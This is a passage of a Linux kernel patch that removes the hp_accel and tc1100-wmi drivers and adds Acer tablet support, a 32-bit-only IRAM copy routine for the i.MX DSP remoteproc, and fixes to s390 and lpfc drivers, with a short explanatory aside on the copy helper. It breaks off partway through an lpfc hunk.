+- * "NX74x0" "HP Compaq nx74"
+- * "NX6325" "HP Compaq nx6325"
+- * "NC4400" "HP Compaq nc4400"
+- */
+-};
+-
+-static void hpled_set(struct delayed_led_classdev *led_cdev, enum led_brightness value)
+-{
+-	struct acpi_device *dev = lis3_dev.bus_priv;
+-	unsigned long long ret; /* Not used when writing */
+-	union acpi_object in_obj[1];
+-	struct acpi_object_list args = { 1, in_obj };
+-
+-	in_obj[0].type          = ACPI_TYPE_INTEGER;
+-	in_obj[0].integer.value = !!value;
+-
+-	acpi_evaluate_integer(dev->handle, "ALED", &args, &ret);
+-}
+-
+-static struct delayed_led_classdev hpled_led = {
+-	.led_classdev = {
+-		.name			= "hp::hddprotect",
+-		.default_trigger	= "none",
+-		.brightness_set		= delayed_sysfs_set,
+-		.flags                  = LED_CORE_SUSPENDRESUME,
+-	},
+-	.set_brightness = hpled_set,
+-};
+-
+-static bool hp_accel_i8042_filter(unsigned char data, unsigned char str,
+-				  struct serio *port)
+-{
+-	static bool extended;
+-
+-	if (str & I8042_STR_AUXDATA)
+-		return false;
+-
+-	if (data == 0xe0) {
+-		extended = true;
+-		return true;
+-	} else if (unlikely(extended)) {
+-		extended = false;
+-
+-		switch (data) {
+-		case ACCEL_1:
+-		case ACCEL_2:
+-		case ACCEL_3:
+-		case ACCEL_4:
+-			return true;
+-		default:
+-			serio_interrupt(port, 0xe0, 0);
+-			return false;
+-		}
+-	}
+-
+-	return false;
+-}
+-
+-static int lis3lv02d_probe(struct platform_device *device)
+-{
+-	int ret;
+-
+-	lis3_dev.bus_priv = ACPI_COMPANION(&device->dev);
+-	lis3_dev.init = lis3lv02d_acpi_init;
+-	lis3_dev.read = lis3lv02d_acpi_read;
+-	lis3_dev.write = lis3lv02d_acpi_write;
+-
+-	/* obtain IRQ number of our device from ACPI */
+-	ret = platform_get_irq_optional(device, 0);
+-	if (ret > 0)
+-		lis3_dev.irq = ret;
+-
+-	/* If possible use a "standard" axes order */
+-	if (lis3_dev.ac.x && lis3_dev.ac.y && lis3_dev.ac.z) {
+-		pr_info("Using custom axes %d,%d,%d\n",
+-			lis3_dev.ac.x, lis3_dev.ac.y, lis3_dev.ac.z);
+-	} else if (dmi_check_system(lis3lv02d_dmi_ids) == 0) {
+-		pr_info("laptop model unknown, using default axes configuration\n");
+-		lis3_dev.ac = lis3lv02d_axis_normal;
+-	}
+-
+-	/* call the core layer to do its init */
+-	ret = lis3lv02d_init_device(&lis3_dev);
+-	if (ret)
+-		return ret;
+-
+-	/* filter to remove HPQ6000 accelerometer data
+-	 * from keyboard bus stream */
+-	if (strstr(dev_name(&device->dev), "HPQ6000"))
+-		i8042_install_filter(hp_accel_i8042_filter);
+-
+-	INIT_WORK(&hpled_led.work, delayed_set_status_worker);
+-	ret = led_classdev_register(NULL, &hpled_led.led_classdev);
+-	if (ret) {
+-		i8042_remove_filter(hp_accel_i8042_filter);
+-		lis3lv02d_joystick_disable(&lis3_dev);
+-		lis3lv02d_poweroff(&lis3_dev);
+-		flush_work(&hpled_led.work);
+-		lis3lv02d_remove_fs(&lis3_dev);
+-		return ret;
+-	}
+-
+-	return ret;
+-}
+-
+-static int lis3lv02d_remove(struct platform_device *device)
+-{
+-	i8042_remove_filter(hp_accel_i8042_filter);
+-	lis3lv02d_joystick_disable(&lis3_dev);
+-	lis3lv02d_poweroff(&lis3_dev);
+-
+-	led_classdev_unregister(&hpled_led.led_classdev);
+-	flush_work(&hpled_led.work);
+-
+-	lis3lv02d_remove_fs(&lis3_dev);
+-	return 0;
+-}
+-
+-static int __maybe_unused lis3lv02d_suspend(struct device *dev)
+-{
+-	/* make sure the device is off when we suspend */
+-	lis3lv02d_poweroff(&lis3_dev);
+-	return 0;
+-}
+-
+-static int __maybe_unused lis3lv02d_resume(struct device *dev)
+-{
+-	lis3lv02d_poweron(&lis3_dev);
+-	return 0;
+-}
+-
+-static SIMPLE_DEV_PM_OPS(hp_accel_pm, lis3lv02d_suspend, lis3lv02d_resume);
+-
+-/* For the HP MDPS aka 3D Driveguard */
+-static struct platform_driver lis3lv02d_driver = {
+-	.probe	= lis3lv02d_probe,
+-	.remove	= lis3lv02d_remove,
+-	.driver	= {
+-		.name	= "hp_accel",
+-		.pm	= &hp_accel_pm,
+-		.acpi_match_table = lis3lv02d_device_ids,
+-	},
+-};
+-module_platform_driver(lis3lv02d_driver);
+-
+-MODULE_DESCRIPTION("Glue between LIS3LV02Dx and HP ACPI BIOS and support for disk protection LED.");
+-MODULE_AUTHOR("Yan Burman, Eric Piel, Pavel Machek");
+-MODULE_LICENSE("GPL");
+diff --git a/drivers/platform/x86/tc1100-wmi.c b/drivers/platform/x86/tc1100-wmi.c
+deleted file mode 100644
+index ded26213c4202..0000000000000
+--- a/drivers/platform/x86/tc1100-wmi.c
++++ /dev/null
+@@ -1,265 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *  HP Compaq TC1100 Tablet WMI Extras Driver
+- *
+- *  Copyright (C) 2007 Carlos Corbacho <carlos@strangeworlds.co.uk>
+- *  Copyright (C) 2004 Jamey Hicks <jamey.hicks@hp.com>
+- *  Copyright (C) 2001, 2002 Andy Grover <andrew.grover@intel.com>
+- *  Copyright (C) 2001, 2002 Paul Diefenbaugh <paul.s.diefenbaugh@intel.com>
+- */
+-
+-#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+-
+-#include <linux/kernel.h>
+-#include <linux/module.h>
+-#include <linux/slab.h>
+-#include <linux/init.h>
+-#include <linux/types.h>
+-#include <linux/acpi.h>
+-#include <linux/platform_device.h>
+-
+-#define GUID "C364AC71-36DB-495A-8494-B439D472A505"
+-
+-#define TC1100_INSTANCE_WIRELESS		1
+-#define TC1100_INSTANCE_JOGDIAL		2
+-
+-MODULE_AUTHOR("Jamey Hicks, Carlos Corbacho");
+-MODULE_DESCRIPTION("HP Compaq TC1100 Tablet WMI Extras");
+-MODULE_LICENSE("GPL");
+-MODULE_ALIAS("wmi:C364AC71-36DB-495A-8494-B439D472A505");
+-
+-static struct platform_device *tc1100_device;
+-
+-struct tc1100_data {
+-	u32 wireless;
+-	u32 jogdial;
+-};
+-
+-#ifdef CONFIG_PM
+-static struct tc1100_data suspend_data;
+-#endif
+-
+-/* --------------------------------------------------------------------------
+-				Device Management
+-   -------------------------------------------------------------------------- */
+-
+-static int get_state(u32 *out, u8 instance)
+-{
+-	u32 tmp;
+-	acpi_status status;
+-	struct acpi_buffer result = { ACPI_ALLOCATE_BUFFER, NULL };
+-	union acpi_object *obj;
+-
+-	if (!out)
+-		return -EINVAL;
+-
+-	if (instance > 2)
+-		return -ENODEV;
+-
+-	status = wmi_query_block(GUID, instance, &result);
+-	if (ACPI_FAILURE(status))
+-		return -ENODEV;
+-
+-	obj = (union acpi_object *) result.pointer;
+-	if (obj && obj->type == ACPI_TYPE_INTEGER) {
+-		tmp = obj->integer.value;
+-	} else {
+-		tmp = 0;
+-	}
+-
+-	if (result.length > 0)
+-		kfree(result.pointer);
+-
+-	switch (instance) {
+-	case TC1100_INSTANCE_WIRELESS:
+-		*out = (tmp == 3) ? 1 : 0;
+-		return 0;
+-	case TC1100_INSTANCE_JOGDIAL:
+-		*out = (tmp == 1) ? 0 : 1;
+-		return 0;
+-	default:
+-		return -ENODEV;
+-	}
+-}
+-
+-static int set_state(u32 *in, u8 instance)
+-{
+-	u32 value;
+-	acpi_status status;
+-	struct acpi_buffer input;
+-
+-	if (!in)
+-		return -EINVAL;
+-
+-	if (instance > 2)
+-		return -ENODEV;
+-
+-	switch (instance) {
+-	case TC1100_INSTANCE_WIRELESS:
+-		value = (*in) ? 1 : 2;
+-		break;
+-	case TC1100_INSTANCE_JOGDIAL:
+-		value = (*in) ? 0 : 1;
+-		break;
+-	default:
+-		return -ENODEV;
+-	}
+-
+-	input.length = sizeof(u32);
+-	input.pointer = &value;
+-
+-	status = wmi_set_block(GUID, instance, &input);
+-	if (ACPI_FAILURE(status))
+-		return -ENODEV;
+-
+-	return 0;
+-}
+-
+-/* --------------------------------------------------------------------------
+-				FS Interface (/sys)
+-   -------------------------------------------------------------------------- */
+-
+-/*
+- * Read/write bool sysfs macro
+- */
+-#define show_set_bool(value, instance) \
+-static ssize_t \
+-show_bool_##value(struct device *dev, struct device_attribute *attr, \
+-	char *buf) \
+-{ \
+-	u32 result; \
+-	acpi_status status = get_state(&result, instance); \
+-	if (ACPI_SUCCESS(status)) \
+-		return sprintf(buf, "%d\n", result); \
+-	return sprintf(buf, "Read error\n"); \
+-} \
+-\
+-static ssize_t \
+-set_bool_##value(struct device *dev, struct device_attribute *attr, \
+-	const char *buf, size_t count) \
+-{ \
+-	u32 tmp = simple_strtoul(buf, NULL, 10); \
+-	acpi_status status = set_state(&tmp, instance); \
+-		if (ACPI_FAILURE(status)) \
+-			return -EINVAL; \
+-	return count; \
+-} \
+-static DEVICE_ATTR(value, S_IRUGO | S_IWUSR, \
+-	show_bool_##value, set_bool_##value);
+-
+-show_set_bool(wireless, TC1100_INSTANCE_WIRELESS);
+-show_set_bool(jogdial, TC1100_INSTANCE_JOGDIAL);
+-
+-static struct attribute *tc1100_attributes[] = {
+-	&dev_attr_wireless.attr,
+-	&dev_attr_jogdial.attr,
+-	NULL
+-};
+-
+-static const struct attribute_group tc1100_attribute_group = {
+-	.attrs	= tc1100_attributes,
+-};
+-
+-/* --------------------------------------------------------------------------
+-				Driver Model
+-   -------------------------------------------------------------------------- */
+-
+-static int __init tc1100_probe(struct platform_device *device)
+-{
+-	return sysfs_create_group(&device->dev.kobj, &tc1100_attribute_group);
+-}
+-
+-
+-static int tc1100_remove(struct platform_device *device)
+-{
+-	sysfs_remove_group(&device->dev.kobj, &tc1100_attribute_group);
+-
+-	return 0;
+-}
+-
+-#ifdef CONFIG_PM
+-static int tc1100_suspend(struct device *dev)
+-{
+-	int ret;
+-
+-	ret = get_state(&suspend_data.wireless, TC1100_INSTANCE_WIRELESS);
+-	if (ret)
+-		return ret;
+-
+-	ret = get_state(&suspend_data.jogdial, TC1100_INSTANCE_JOGDIAL);
+-	if (ret)
+-		return ret;
+-
+-	return 0;
+-}
+-
+-static int tc1100_resume(struct device *dev)
+-{
+-	int ret;
+-
+-	ret = set_state(&suspend_data.wireless, TC1100_INSTANCE_WIRELESS);
+-	if (ret)
+-		return ret;
+-
+-	ret = set_state(&suspend_data.jogdial, TC1100_INSTANCE_JOGDIAL);
+-	if (ret)
+-		return ret;
+-
+-	return 0;
+-}
+-
+-static const struct dev_pm_ops tc1100_pm_ops = {
+-	.suspend	= tc1100_suspend,
+-	.resume		= tc1100_resume,
+-	.freeze		= tc1100_suspend,
+-	.restore	= tc1100_resume,
+-};
+-#endif
+-
+-static struct platform_driver tc1100_driver = {
+-	.driver = {
+-		.name = "tc1100-wmi",
+-#ifdef CONFIG_PM
+-		.pm = &tc1100_pm_ops,
+-#endif
+-	},
+-	.remove = tc1100_remove,
+-};
+-
+-static int __init tc1100_init(void)
+-{
+-	int error;
+-
+-	if (!wmi_has_guid(GUID))
+-		return -ENODEV;
+-
+-	tc1100_device = platform_device_alloc("tc1100-wmi", PLATFORM_DEVID_NONE);
+-	if (!tc1100_device)
+-		return -ENOMEM;
+-
+-	error = platform_device_add(tc1100_device);
+-	if (error)
+-		goto err_device_put;
+-
+-	error = platform_driver_probe(&tc1100_driver, tc1100_probe);
+-	if (error)
+-		goto err_device_del;
+-
+-	pr_info("HP Compaq TC1100 Tablet WMI Extras loaded\n");
+-	return 0;
+-
+- err_device_del:
+-	platform_device_del(tc1100_device);
+- err_device_put:
+-	platform_device_put(tc1100_device);
+-	return error;
+-}
+-
+-static void __exit tc1100_exit(void)
+-{
+-	platform_device_unregister(tc1100_device);
+-	platform_driver_unregister(&tc1100_driver);
+-}
+-
+-module_init(tc1100_init);
+-module_exit(tc1100_exit);
+diff --git a/drivers/platform/x86/x86-android-tablets.c b/drivers/platform/x86/x86-android-tablets.c
+index 123a4618db55f..9178076d9d7da 100644
+--- a/drivers/platform/x86/x86-android-tablets.c
++++ b/drivers/platform/x86/x86-android-tablets.c
+@@ -265,6 +265,88 @@ static struct gpiod_lookup_table int3496_gpo2_pin22_gpios = {
+ 	},
+ };
+ 
++static struct gpiod_lookup_table int3496_reference_gpios = {
++	.dev_id = "intel-int3496",
++	.table = {
++		GPIO_LOOKUP("INT33FC:01", 15, "vbus", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("INT33FC:02", 1, "mux", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("INT33FC:02", 18, "id", GPIO_ACTIVE_HIGH),
++		{ }
++	},
++};
++
++/* Acer Iconia One 7 B1-750 has an Android factory img with everything hardcoded */
++static const char * const acer_b1_750_mount_matrix[] = {
++	"-1", "0", "0",
++	"0", "1", "0",
++	"0", "0", "1"
++};
++
++static const struct property_entry acer_b1_750_bma250e_props[] = {
++	PROPERTY_ENTRY_STRING_ARRAY("mount-matrix", acer_b1_750_mount_matrix),
++	{ }
++};
++
++static const struct software_node acer_b1_750_bma250e_node = {
++	.properties = acer_b1_750_bma250e_props,
++};
++
++static const struct x86_i2c_client_info acer_b1_750_i2c_clients[] __initconst = {
++	{
++		/* Novatek NVT-ts touchscreen */
++		.board_info = {
++			.type = "NVT-ts",
++			.addr = 0x34,
++			.dev_name = "NVT-ts",
++		},
++		.adapter_path = "\\_SB_.I2C4",
++		.irq_data = {
++			.type = X86_ACPI_IRQ_TYPE_GPIOINT,
++			.chip = "INT33FC:02",
++			.index = 3,
++			.trigger = ACPI_EDGE_SENSITIVE,
++			.polarity = ACPI_ACTIVE_LOW,
++		},
++	}, {
++		/* BMA250E accelerometer */
++		.board_info = {
++			.type = "bma250e",
++			.addr = 0x18,
++			.swnode = &acer_b1_750_bma250e_node,
++		},
++		.adapter_path = "\\_SB_.I2C3",
++		.irq_data = {
++			.type = X86_ACPI_IRQ_TYPE_GPIOINT,
++			.chip = "INT33FC:02",
++			.index = 25,
++			.trigger = ACPI_LEVEL_SENSITIVE,
++			.polarity = ACPI_ACTIVE_HIGH,
++		},
++	},
++};
++
++static struct gpiod_lookup_table acer_b1_750_goodix_gpios = {
++	.dev_id = "i2c-NVT-ts",
++	.table = {
++		GPIO_LOOKUP("INT33FC:01", 26, "reset", GPIO_ACTIVE_LOW),
++		{ }
++	},
++};
++
++static struct gpiod_lookup_table * const acer_b1_750_gpios[] = {
++	&acer_b1_750_goodix_gpios,
++	&int3496_reference_gpios,
++	NULL
++};
++
++static const struct x86_dev_info acer_b1_750_info __initconst = {
++	.i2c_client_info = acer_b1_750_i2c_clients,
++	.i2c_client_count = ARRAY_SIZE(acer_b1_750_i2c_clients),
++	.pdev_info = int3496_pdevs,
++	.pdev_count = ARRAY_SIZE(int3496_pdevs),
++	.gpiod_lookup_tables = acer_b1_750_gpios,
++};
++
+ /*
+  * Advantech MICA-071
+  * This is a standard Windows tablet, but it has an extra "quick launch" button
+@@ -1298,17 +1380,8 @@ static const struct x86_i2c_client_info nextbook_ares8_i2c_clients[] __initconst
+ 	},
+ };
+ 
+-static struct gpiod_lookup_table nextbook_ares8_int3496_gpios = {
+-	.dev_id = "intel-int3496",
+-	.table = {
+-		GPIO_LOOKUP("INT33FC:02", 1, "mux", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("INT33FC:02", 18, "id", GPIO_ACTIVE_HIGH),
+-		{ }
+-	},
+-};
+-
+ static struct gpiod_lookup_table * const nextbook_ares8_gpios[] = {
+-	&nextbook_ares8_int3496_gpios,
++	&int3496_reference_gpios,
+ 	NULL
+ };
+ 
+@@ -1435,6 +1508,14 @@ static const struct x86_dev_info xiaomi_mipad2_info __initconst = {
+ };
+ 
+ static const struct dmi_system_id x86_android_tablet_ids[] __initconst = {
++	{
++		/* Acer Iconia One 7 B1-750 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "VESPA2"),
++		},
++		.driver_data = (void *)&acer_b1_750_info,
++	},
+ 	{
+ 		/* Advantech MICA-071 */
+ 		.matches = {
+diff --git a/drivers/remoteproc/imx_dsp_rproc.c b/drivers/remoteproc/imx_dsp_rproc.c
+index 506ec9565716b..dcd07a6a5e945 100644
+--- a/drivers/remoteproc/imx_dsp_rproc.c
++++ b/drivers/remoteproc/imx_dsp_rproc.c
+@@ -721,6 +721,191 @@ static void imx_dsp_rproc_kick(struct rproc *rproc, int vqid)
+ 		dev_err(dev, "%s: failed (%d, err:%d)\n", __func__, vqid, err);
+ }
+ 
++/*
++ * Custom memory copy implementation for i.MX DSP Cores
++ *
++ * The IRAM is part of the HiFi DSP.
++ * According to hw specs only 32-bit writes are allowed.
++ */
++static int imx_dsp_rproc_memcpy(void *dst, const void *src, size_t size)
++{
++	void __iomem *dest = (void __iomem *)dst;
++	const u8 *src_byte = src;
++	const u32 *source = src;
++	u32 affected_mask;
++	int i, q, r;
++	u32 tmp;
++
++	/* destination must be 32bit aligned */
++	if (!IS_ALIGNED((uintptr_t)dest, 4))
++		return -EINVAL;
++
++	q = size / 4;
++	r = size % 4;
++
++	/* copy data in units of 32 bits at a time */
++	for (i = 0; i < q; i++)
++		writel(source[i], dest + i * 4);
++
++	if (r) {
++		affected_mask = GENMASK(8 * r, 0);
++
++		/*
++		 * first read the 32bit data of dest, then change affected
++		 * bytes, and write back to dest.
++		 * Unaffected bytes should not be changed
++		 */
++		tmp = readl(dest + q * 4);
++		tmp &= ~affected_mask;
++
++		/* avoid reading after end of source */
++		for (i = 0; i < r; i++)
++			tmp |= (src_byte[q * 4 + i] << (8 * i));
++
++		writel(tmp, dest + q * 4);
++	}
++
++	return 0;
++}
++
++/*
++ * Custom memset implementation for i.MX DSP Cores
++ *
++ * The IRAM is part of the HiFi DSP.
++ * According to hw specs only 32-bit writes are allowed.
++ */
++static int imx_dsp_rproc_memset(void *addr, u8 value, size_t size)
++{
++	void __iomem *tmp_dst = (void __iomem *)addr;
++	u32 tmp_val = value;
++	u32 affected_mask;
++	int q, r;
++	u32 tmp;
++
++	/* destination must be 32bit aligned */
++	if (!IS_ALIGNED((uintptr_t)addr, 4))
++		return -EINVAL;
++
++	tmp_val |= tmp_val << 8;
++	tmp_val |= tmp_val << 16;
++
++	q = size / 4;
++	r = size % 4;
++
++	while (q--)
++		writel(tmp_val, tmp_dst++);
++
++	if (r) {
++		affected_mask = GENMASK(8 * r, 0);
++
++		/*
++		 * first read the 32bit data of addr, then change affected
++		 * bytes, and write back to addr.
++		 * Unaffected bytes should not be changed
++		 */
++		tmp = readl(tmp_dst);
++		tmp &= ~affected_mask;
++
++		tmp |= (tmp_val & affected_mask);
++		writel(tmp, tmp_dst);
++	}
++
++	return 0;
++}
++
++/*
++ * imx_dsp_rproc_elf_load_segments() - load firmware segments to memory
++ * @rproc: remote processor which will be booted using these fw segments
++ * @fw: the ELF firmware image
++ *
++ * This function loads the firmware segments to memory, where the remote
++ * processor expects them.
++ *
++ * Return: 0 on success and an appropriate error code otherwise
++ */
++static int imx_dsp_rproc_elf_load_segments(struct rproc *rproc, const struct firmware *fw)
++{
++	struct device *dev = &rproc->dev;
++	const void *ehdr, *phdr;
++	int i, ret = 0;
++	u16 phnum;
++	const u8 *elf_data = fw->data;
++	u8 class = fw_elf_get_class(fw);
++	u32 elf_phdr_get_size = elf_size_of_phdr(class);
++
++	ehdr = elf_data;
++	phnum = elf_hdr_get_e_phnum(class, ehdr);
++	phdr = elf_data + elf_hdr_get_e_phoff(class, ehdr);
++
++	/* go through the available ELF segments */
++	for (i = 0; i < phnum; i++, phdr += elf_phdr_get_size) {
++		u64 da = elf_phdr_get_p_paddr(class, phdr);
++		u64 memsz = elf_phdr_get_p_memsz(class, phdr);
++		u64 filesz = elf_phdr_get_p_filesz(class, phdr);
++		u64 offset = elf_phdr_get_p_offset(class, phdr);
++		u32 type = elf_phdr_get_p_type(class, phdr);
++		void *ptr;
++
++		if (type != PT_LOAD || !memsz)
++			continue;
++
++		dev_dbg(dev, "phdr: type %d da 0x%llx memsz 0x%llx filesz 0x%llx\n",
++			type, da, memsz, filesz);
++
++		if (filesz > memsz) {
++			dev_err(dev, "bad phdr filesz 0x%llx memsz 0x%llx\n",
++				filesz, memsz);
++			ret = -EINVAL;
++			break;
++		}
++
++		if (offset + filesz > fw->size) {
++			dev_err(dev, "truncated fw: need 0x%llx avail 0x%zx\n",
++				offset + filesz, fw->size);
++			ret = -EINVAL;
++			break;
++		}
++
++		if (!rproc_u64_fit_in_size_t(memsz)) {
++			dev_err(dev, "size (%llx) does not fit in size_t type\n",
++				memsz);
++			ret = -EOVERFLOW;
++			break;
++		}
++
++		/* grab the kernel address for this device address */
++		ptr = rproc_da_to_va(rproc, da, memsz, NULL);
++		if (!ptr) {
++			dev_err(dev, "bad phdr da 0x%llx mem 0x%llx\n", da,
++				memsz);
++			ret = -EINVAL;
++			break;
++		}
++
++		/* put the segment where the remote processor expects it */
++		if (filesz) {
++			ret = imx_dsp_rproc_memcpy(ptr, elf_data + offset, filesz);
++			if (ret) {
++				dev_err(dev, "memory copy failed for da 0x%llx memsz 0x%llx\n",
++					da, memsz);
++				break;
++			}
++		}
++
++		/* zero out remaining memory for this segment */
++		if (memsz > filesz) {
++			ret = imx_dsp_rproc_memset(ptr + filesz, 0, memsz - filesz);
++			if (ret) {
++				dev_err(dev, "memset failed for da 0x%llx memsz 0x%llx\n",
++					da, memsz);
++				break;
++			}
++		}
++	}
++
++	return ret;
++}
++
+ static int imx_dsp_rproc_parse_fw(struct rproc *rproc, const struct firmware *fw)
+ {
+ 	if (rproc_elf_load_rsc_table(rproc, fw))
+@@ -735,7 +920,7 @@ static const struct rproc_ops imx_dsp_rproc_ops = {
+ 	.start		= imx_dsp_rproc_start,
+ 	.stop		= imx_dsp_rproc_stop,
+ 	.kick		= imx_dsp_rproc_kick,
+-	.load		= rproc_elf_load_segments,
++	.load		= imx_dsp_rproc_elf_load_segments,
+ 	.parse_fw	= imx_dsp_rproc_parse_fw,
+ 	.sanity_check	= rproc_elf_sanity_check,
+ 	.get_boot_addr	= rproc_elf_get_boot_addr,
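
The copy helper above exists because, per its comment, the DSP's IRAM only tolerates full 32-bit writes. Whole words go out with writel(); a 1-3 byte tail is handled by reading the destination word back, patching just the affected bytes, and writing the whole word again (the driver clears them in one masked operation; the sketch below does it per byte). A standalone little-endian illustration on plain memory, where ordinary loads and stores stand in for readl()/writel():

#include <stdint.h>
#include <string.h>

static void copy_words_only(uint32_t *dst, const uint8_t *src, size_t size)
{
	size_t q = size / 4, r = size % 4, i;

	for (i = 0; i < q; i++) {
		uint32_t w;

		memcpy(&w, src + i * 4, sizeof(w));	/* src may be unaligned */
		dst[i] = w;				/* one full 32-bit store */
	}

	if (r) {
		uint32_t tmp = dst[q];			/* read the affected word back */

		for (i = 0; i < r; i++) {
			tmp &= ~(0xffu << (8 * i));	/* clear byte i */
			tmp |= (uint32_t)src[q * 4 + i] << (8 * i);
		}
		dst[q] = tmp;				/* single 32-bit write-back */
	}
}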
+diff --git a/drivers/remoteproc/stm32_rproc.c b/drivers/remoteproc/stm32_rproc.c
+index 23c1690b8d73f..8746cbb1f168d 100644
+--- a/drivers/remoteproc/stm32_rproc.c
++++ b/drivers/remoteproc/stm32_rproc.c
+@@ -291,8 +291,16 @@ static void stm32_rproc_mb_vq_work(struct work_struct *work)
+ 	struct stm32_mbox *mb = container_of(work, struct stm32_mbox, vq_work);
+ 	struct rproc *rproc = dev_get_drvdata(mb->client.dev);
+ 
++	mutex_lock(&rproc->lock);
++
++	if (rproc->state != RPROC_RUNNING)
++		goto unlock_mutex;
++
+ 	if (rproc_vq_interrupt(rproc, mb->vq_id) == IRQ_NONE)
+ 		dev_dbg(&rproc->dev, "no message found in vq%d\n", mb->vq_id);
++
++unlock_mutex:
++	mutex_unlock(&rproc->lock);
+ }
+ 
+ static void stm32_rproc_mb_callback(struct mbox_client *cl, void *data)
+diff --git a/drivers/s390/block/dasd_eckd.c b/drivers/s390/block/dasd_eckd.c
+index b20ce86b97b29..792e5d245bc38 100644
+--- a/drivers/s390/block/dasd_eckd.c
++++ b/drivers/s390/block/dasd_eckd.c
+@@ -127,6 +127,8 @@ static int prepare_itcw(struct itcw *, unsigned int, unsigned int, int,
+ 			struct dasd_device *, struct dasd_device *,
+ 			unsigned int, int, unsigned int, unsigned int,
+ 			unsigned int, unsigned int);
++static int dasd_eckd_query_pprc_status(struct dasd_device *,
++				       struct dasd_pprc_data_sc4 *);
+ 
+ /* initial attempt at a probe function. this can be simplified once
+  * the other detection code is gone */
+@@ -3732,6 +3734,26 @@ static int count_exts(unsigned int from, unsigned int to, int trks_per_ext)
+ 	return count;
+ }
+ 
++static int dasd_in_copy_relation(struct dasd_device *device)
++{
++	struct dasd_pprc_data_sc4 *temp;
++	int rc;
++
++	if (!dasd_eckd_pprc_enabled(device))
++		return 0;
++
++	temp = kzalloc(sizeof(*temp), GFP_KERNEL);
++	if (!temp)
++		return -ENOMEM;
++
++	rc = dasd_eckd_query_pprc_status(device, temp);
++	if (!rc)
++		rc = temp->dev_info[0].state;
++
++	kfree(temp);
++	return rc;
++}
++
+ /*
+  * Release allocated space for a given range or an entire volume.
+  */
+@@ -3748,6 +3770,7 @@ dasd_eckd_dso_ras(struct dasd_device *device, struct dasd_block *block,
+ 	int cur_to_trk, cur_from_trk;
+ 	struct dasd_ccw_req *cqr;
+ 	u32 beg_cyl, end_cyl;
++	int copy_relation;
+ 	struct ccw1 *ccw;
+ 	int trks_per_ext;
+ 	size_t ras_size;
+@@ -3759,6 +3782,10 @@ dasd_eckd_dso_ras(struct dasd_device *device, struct dasd_block *block,
+ 	if (dasd_eckd_ras_sanity_checks(device, first_trk, last_trk))
+ 		return ERR_PTR(-EINVAL);
+ 
++	copy_relation = dasd_in_copy_relation(device);
++	if (copy_relation < 0)
++		return ERR_PTR(copy_relation);
++
+ 	rq = req ? blk_mq_rq_to_pdu(req) : NULL;
+ 
+ 	features = &private->features;
+@@ -3787,9 +3814,11 @@ dasd_eckd_dso_ras(struct dasd_device *device, struct dasd_block *block,
+ 	/*
+ 	 * This bit guarantees initialisation of tracks within an extent that is
+ 	 * not fully specified, but is only supported with a certain feature
+-	 * subset.
++	 * subset and for devices not in a copy relation.
+ 	 */
+-	ras_data->op_flags.guarantee_init = !!(features->feature[56] & 0x01);
++	if (features->feature[56] & 0x01 && !copy_relation)
++		ras_data->op_flags.guarantee_init = 1;
++
+ 	ras_data->lss = private->conf.ned->ID;
+ 	ras_data->dev_addr = private->conf.ned->unit_addr;
+ 	ras_data->nr_exts = nr_exts;
+diff --git a/drivers/s390/cio/device.c b/drivers/s390/cio/device.c
+index 3b1cd0c96a74b..ba4c69226c337 100644
+--- a/drivers/s390/cio/device.c
++++ b/drivers/s390/cio/device.c
+@@ -1102,6 +1102,8 @@ static void io_subchannel_verify(struct subchannel *sch)
+ 	cdev = sch_get_cdev(sch);
+ 	if (cdev)
+ 		dev_fsm_event(cdev, DEV_EVENT_VERIFY);
++	else
++		css_schedule_eval(sch->schid);
+ }
+ 
+ static void io_subchannel_terminate_path(struct subchannel *sch, u8 mask)
+diff --git a/drivers/s390/cio/qdio.h b/drivers/s390/cio/qdio.h
+index 5ea6249d81803..641f0dbb65a90 100644
+--- a/drivers/s390/cio/qdio.h
++++ b/drivers/s390/cio/qdio.h
+@@ -95,7 +95,7 @@ static inline int do_sqbs(u64 token, unsigned char state, int queue,
+ 		"	lgr	1,%[token]\n"
+ 		"	.insn	rsy,0xeb000000008a,%[qs],%[ccq],0(%[state])"
+ 		: [ccq] "+&d" (_ccq), [qs] "+&d" (_queuestart)
+-		: [state] "d" ((unsigned long)state), [token] "d" (token)
++		: [state] "a" ((unsigned long)state), [token] "d" (token)
+ 		: "memory", "cc", "1");
+ 	*count = _ccq & 0xff;
+ 	*start = _queuestart & 0xff;
+diff --git a/drivers/scsi/lpfc/lpfc_debugfs.c b/drivers/scsi/lpfc/lpfc_debugfs.c
+index f5252e45a48a2..3e365e5e194a2 100644
+--- a/drivers/scsi/lpfc/lpfc_debugfs.c
++++ b/drivers/scsi/lpfc/lpfc_debugfs.c
+@@ -2157,10 +2157,13 @@ lpfc_debugfs_lockstat_write(struct file *file, const char __user *buf,
+ 	char mybuf[64];
+ 	char *pbuf;
+ 	int i;
++	size_t bsize;
+ 
+ 	memset(mybuf, 0, sizeof(mybuf));
+ 
+-	if (copy_from_user(mybuf, buf, nbytes))
++	bsize = min(nbytes, (sizeof(mybuf) - 1));
++
++	if (copy_from_user(mybuf, buf, bsize))
+ 		return -EFAULT;
+ 	pbuf = &mybuf[0];
+ 
+@@ -2181,7 +2184,7 @@ lpfc_debugfs_lockstat_write(struct file *file, const char __user *buf,
+ 			qp->lock_conflict.wq_access = 0;
+ 		}
+ 	}
+-	return nbytes;
++	return bsize;
+ }
+ #endif
+ 
+diff --git a/drivers/scsi/lpfc/lpfc_els.c b/drivers/scsi/lpfc/lpfc_els.c
+index 863b2125fed6c..ddd5949d8fc01 100644
+--- a/drivers/scsi/lpfc/lpfc_els.c
++++ b/drivers/scsi/lpfc/lpfc_els.c
+@@ -5402,18 +5402,20 @@ out:
+ 	 * these conditions and release the RPI.
+ 	 */
+ 	if (phba->sli_rev == LPFC_SLI_REV4 &&
+-	    (vport && vport->port_type == LPFC_NPIV_PORT) &&
+-	    !(ndlp->fc4_xpt_flags & SCSI_XPT_REGD) &&
+-	    ndlp->nlp_flag & NLP_RELEASE_RPI) {
+-		if (ndlp->nlp_state !=  NLP_STE_PLOGI_ISSUE &&
+-		    ndlp->nlp_state != NLP_STE_REG_LOGIN_ISSUE) {
+-			lpfc_sli4_free_rpi(phba, ndlp->nlp_rpi);
